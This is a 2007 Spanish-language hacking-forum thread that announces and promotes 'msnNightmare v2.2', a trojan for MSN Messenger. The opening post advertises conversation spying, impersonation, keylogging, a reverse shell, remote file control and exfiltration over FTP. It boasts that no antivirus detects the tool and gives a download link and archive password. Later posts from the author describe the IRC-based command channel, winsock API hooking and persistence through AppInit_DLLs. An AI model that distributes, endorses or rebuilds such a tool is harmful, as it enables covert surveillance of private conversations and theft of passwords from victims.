elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
24 Mayo 2012, 05:47  


Tema destacado: Entra al canal IRC oficial de #elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  msnNightmare v2.2
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: msnNightmare v2.2  (Leído 14,892 veces)
MazarD
Colaborador
***
Desconectado Desconectado

Mensajes: 880


mazard.info


Ver Perfil WWW
msnNightmare v2.2
« en: 21 Julio 2007, 01:22 »

He sacado una nueva versión del msnNightmare, esta es la v2.2, es gratuita ni sms ni historias, no creo que vaya a sacar mas versiones ya me aburre bastante programarlo. En breve el código fuente completo de la última versión.

Sus funciones:
>Espiar conversaciones de msn messenger
>Intervenir en una conversacion suplantando al pc remoto
>Evitar recepción i/o envio de mensajes
>Recuperación de passwords del messenger (en el registro y por keylogger)
>Explorar/Ejecutar/Eliminar/Subir/Descargar archivos remotos
>Desinstalar remotamente
>Shell Inversa
>Pequeña utilidad para comprobar si tienes los puertos del router abiertos
>Función subir log de conversaciones y passwords a ftp para no tener que abrir puertos
>Conexión sin necesidad de determinar ips
>Mucho mas estable que la versión 2.1
>Escaneado con 30 antivirus, no es detectado por ninguno.


Lo nuevo:
-De nuevo indetectable a 30 antivirus, incluidos los mas populares.
-Solucionados problemas con la shell remota
-Solucionados problemas con la función ftp
-Solucionados problemas con la subida/descarga
-Modificada la interfaz y configuración
-Añadida mas información sobre el archivo a descargar (doble clic)
-Añadido estado actual de ensordecer/silenciar
-Añadida función para editar el server remoto
-Añadida función para actualizar el server remoto a v2.2
-Añadida lista de conversaciones segun correo


La descarga:
http://www.mazard.info/dloads.php

El password para descomprimir:
msnNightmare


No utilizar el servidor irc.mazard.ddns.info dentro de poco se cerrará!

Saludos.

« Última modificación: 21 Julio 2007, 01:46 por MazarD » En línea

-Learn as if you were to live forever, live as if you were to die tomorrow-

http://www.mazard.info
http://twitter.com/MazarD
irc://irc.freenode.org/elhacker.net
3k1n0x


Desconectado Desconectado

Mensajes: 324



Ver Perfil
Re: msnNightmare v2.2
« Respuesta #1 en: 21 Julio 2007, 03:29 »

esta muy bueno! , pero no se casi de irc y no me funciono, lo probe y no me aparece nada probablemente porque solo probe con los servidores irc ahi listados salu2s
En línea

T3fL0n -> 3k1n0x
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.983


Ver Perfil WWW
Re: msnNightmare v2.2
« Respuesta #2 en: 21 Julio 2007, 14:50 »

Tiene muy wena pinta.. lo unico malo s q el nod me a detectado una dll.. pero bue seguro q no es muy dificil hacerla indetectable  ;)

Felicidades, me encanta el programa, sobre todo la interfaz q le has puesto, te ha kedado de lujo  ;D ;D
En línea
MazarD
Colaborador
***
Desconectado Desconectado

Mensajes: 880


mazard.info


Ver Perfil WWW
Re: msnNightmare v2.2
« Respuesta #3 en: 21 Julio 2007, 14:53 »

Hexas
Hombre no te aparecerá gente así mágicamente, es un troyano y no necesitas saber nada de irc.

En "config" en el cliente introduces un server de irc.
Al crear un server para enviar, en "server irc" introduces el mismo.

Y ya está, cada vez que esté conectado lo verás en la lista "conectados" sin tener que meter ips, ddns(no-ips) ni nada. Solo tienes que abrir los puertos 6611 y 1111 si tienes router y sino siempre puedes usar la función ftp.


E0N Gracias  :D
El nod detectará el cliente puesto que ni lo he mirado, pero el servidor en virus total no lo detecta ninguno de los 30 antivirus.

Saludos.
En línea

-Learn as if you were to live forever, live as if you were to die tomorrow-

http://www.mazard.info
http://twitter.com/MazarD
irc://irc.freenode.org/elhacker.net
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.983


Ver Perfil WWW
Re: msnNightmare v2.2
« Respuesta #4 en: 21 Julio 2007, 14:58 »

Lo q detecta es la update.dll, no se si ira en el server o en cliente..
En línea
MazarD
Colaborador
***
Desconectado Desconectado

Mensajes: 880


mazard.info


Ver Perfil WWW
Re: msnNightmare v2.2
« Respuesta #5 en: 21 Julio 2007, 15:31 »

Ahm eeeeeentiendo,
Al añadirle a todo el asunto un TerminateProcess pasa a detectarlo, se puede solucionar pero creo que no es necesario.

El update.dll solo sirve para los que utilizaban versiones anteriores de msnNightmare para actualizar sus remotos a la nueva versión. Las versiones anteriores son detectadas por todos los antivirus así que si alguien necesita actualizar será porque el remoto no tiene antivirus o lo tiene caducado o lo que sea. Que no hay demasiado problema y no veo necesario solucionarlo vamos.

Saludos.
En línea

-Learn as if you were to live forever, live as if you were to die tomorrow-

http://www.mazard.info
http://twitter.com/MazarD
irc://irc.freenode.org/elhacker.net
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.983


Ver Perfil WWW
Re: msnNightmare v2.2
« Respuesta #6 en: 21 Julio 2007, 16:27 »

Am ya entiendo  ;D la verdad es que no hay ningun problema por q esa dll sea detectada.

De nuevo felicidades, muy buen programa ;)
En línea
3k1n0x


Desconectado Desconectado

Mensajes: 324



Ver Perfil
Re: msnNightmare v2.2
« Respuesta #7 en: 21 Julio 2007, 19:19 »

yo le doy conectar al servidor y se conecta hasta q dice Notifybot working, ejecuto el server en otra pc y no me sale na ya probe en 2, y cuando le doy a lo de ftp me tira error "Error '383' en tiempo de ejecución : La propiedad 'Text' es de sólo lectura"
En línea

T3fL0n -> 3k1n0x
mototron

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: msnNightmare v2.2
« Respuesta #8 en: 21 Julio 2007, 20:44 »

oie men soy nuebo en esto me podrias ayudar a como utilisarlo
En línea
BenRu
The Prodigy


Desconectado Desconectado

Mensajes: 4.004


Ver Perfil
Re: msnNightmare v2.2
« Respuesta #9 en: 21 Julio 2007, 20:47 »

oie men soy nuebo en esto me podrias ayudar a como utilisarlo

Dentro del zip viene un readme.


Muy bueno, Mazard.  ;)
En línea
MazarD
Colaborador
***
Desconectado Desconectado

Mensajes: 880


mazard.info


Ver Perfil WWW
Re: msnNightmare v2.2
« Respuesta #10 en: 22 Julio 2007, 22:56 »

Citar
y cuando le doy a lo de ftp me tira error "Error '383' en tiempo de ejecución : La propiedad 'Text' es de sólo lectura"
Si, la verdad es que no me he matado demasiado en solucionar errores de usuario, eso es debido a que no tienes ningun infectado conectado, entonces no tiene sentido usar la función ftp, no está previsto el error y falla. A ver si luego lo soluciono.

Bueno, BenRu preguntaba por privado que como funciona la conexión del msnNightmare y en que está programado, con su permiso respondo aquí por si alguien mas tiene curiosidad y tal.

El cliente y el servidor conectan a cierto servidor de irc, hasta ahora era irc.mazard.ddns.info, allí el cliente busca los nicks de sus infectados, cuando encuentra uno de la lista conecta otro bot al irc con nick aleatorio y le envia por privado al infectado la ip del cliente, el infectado solo hace caso al nick del cliente y al ser un aleatorio bastante bestia es practicamente imposible "robar infectados".
Una vez el cliente ha enviado la ip al servidor por query en el irc, el servidor conecta al cliente, osea conexión inversa tipica.
La gracia de toda la historia es que el cliente no tenga que introducir ninguna ip, ni tener dominio ddns como no-ip, dyndns... en principio pensé en que toda la transferencia de datos se hiciera a través de irc para que los clientes no necesitaran de abrir puertos, pero a riesgo de que me tacharan de espiar todo y demás mariconadas decidí que solo se usara el server para que las dos maquinas "se encontraran".

Está escrito el cliente en visual basic y el servidor en c con clases. Y para espiar el messenger usa api hooking para hookear recv y send de winsock, luego filtra el protocolo del messenger para obtener el texto de las conversaciones "limpio", y en el caso de la suplantacion guarda los manejadores de los sockets para enviar a la conversación concreta el texto que decidamos integrandolo en el protocolo del messenger.

Aquí escribí hace tiempo un poco de info "técnica" sobre el tema:
http://mzrdzoneforo.tomahost.org/index.php?topic=33.0[/quote]


Saludos.
En línea

-Learn as if you were to live forever, live as if you were to die tomorrow-

http://www.mazard.info
http://twitter.com/MazarD
irc://irc.freenode.org/elhacker.net
LeandroA


Desconectado Desconectado

Mensajes: 693


Seguime


Ver Perfil WWW
Re: msnNightmare v2.2
« Respuesta #11 en: 23 Julio 2007, 00:57 »

solo una pregunta si lo ejecuto donde se instala y como lo elimino, aparece dentro de los procesos??, obiamente albando del cliente (el que genere)


Saludos
En línea

Freeze.


Desconectado Desconectado

Mensajes: 2.731



Ver Perfil WWW
Re: msnNightmare v2.2
« Respuesta #12 en: 23 Julio 2007, 02:31 »

No pude Ni auto-infectarme...
En línea

MazarD
Colaborador
***
Desconectado Desconectado

Mensajes: 880


mazard.info


Ver Perfil WWW
Re: msnNightmare v2.2
« Respuesta #13 en: 23 Julio 2007, 22:15 »

Citar
No pude Ni auto-infectarme...
Pues mas fácil que esto ya....

Citar
solo una pregunta si lo ejecuto donde se instala y como lo elimino, aparece dentro de los procesos??
No aparece en la lista de procesos ya que es una dll que se carga junto con el messenger, para desinstalarlo haz lo siguiente:

Citar
1.-Cerrar el messenger

2.-Inicio--ejecutar--regedit

HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows\AppInit_Dlls
Abrirlo y borrar cMessengerMD.dll y hMessengerMD.dll

3.-Ir a la carpeta del sistema de windows (puede variar segun las particiones y el sistema operativo). La habitual es en "c:\windows\system32"

Eliminar cMessengerMD.dll,hMessengerMD.dll
y de lo siguiente todo lo que encuentres (Algunos puede que no estén)
:
msnxmd.dll
msngmd.dll
msnbmd.dll
msnemd.dll
msnpmd.dll
msnp2md.dll
En línea

-Learn as if you were to live forever, live as if you were to die tomorrow-

http://www.mazard.info
http://twitter.com/MazarD
irc://irc.freenode.org/elhacker.net
Freeze.


Desconectado Desconectado

Mensajes: 2.731



Ver Perfil WWW
Re: msnNightmare v2.2
« Respuesta #14 en: 23 Julio 2007, 23:45 »

Ok... _Gracias... :xD
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines